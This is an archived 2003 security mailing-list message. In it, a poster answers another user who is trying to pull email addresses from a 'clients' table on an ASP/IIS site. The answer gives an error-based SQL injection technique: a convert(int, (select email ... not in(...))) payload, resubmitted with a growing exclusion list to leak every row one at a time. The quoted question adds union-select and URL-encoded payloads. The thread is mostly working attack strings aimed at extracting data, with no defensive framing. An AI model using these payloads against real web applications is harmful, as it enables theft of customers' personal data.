Re: SQL injection - get more values

From: Thaidn (thaidn@idealscript.com)
Date: Wed Feb 12 2003 - 14:05:07 EST

• Next message: Brass, Phil (ISS Atlanta): "RE: SQL injection - get more values"
• Previous message: Panos Dimitriou: "RE: SQL injection - get more values"
• In reply to: Daniel Savi: "SQL injection - get more values"
• Next in thread: Kevin Spett: "Re: SQL injection - get more values"
• Reply: Kevin Spett: "Re: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hello, Daniel
Exactly, you can use "not in" with convert.
 'convert(int,(select email from clients where email not in('anon@isp.com')))
--> return the next email value in table clients, for example daniel@isp.com,
and go on submitting 'convert(int,(select email from clients where email not
in('anon@isp.com','daniel@isp.com))), you will get all values in table
clients.
 note: this only works in ASP/IIS, not work in CFM application because CFM
escapes all " ' " in the query string, when I replace " ' " by " '' ",
sometimes it works but not always.
hehe, sorry for my english :D.
Hope this helpful.
 

On Thursday 13 February 2003 12:48 am, Daniel Savi wrote:
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anon@isp.com' to a column of
> data type int
>
> Now, my problem: How can i get other e-mail from table knowing one valid
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email
>
> > 'anon@isp.com')) %2b '
>
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tip are welcome!
>
> Thanks
>
> ---------------------------------------------------------------------------
>- This list is provided by the SecurityFocus Security Intelligence Alert
> (SIA) Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Brass, Phil (ISS Atlanta): "RE: SQL injection - get more values"
• Previous message: Panos Dimitriou: "RE: SQL injection - get more values"
• In reply to: Daniel Savi: "SQL injection - get more values"
• Next in thread: Kevin Spett: "Re: SQL injection - get more values"
• Reply: Kevin Spett: "Re: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT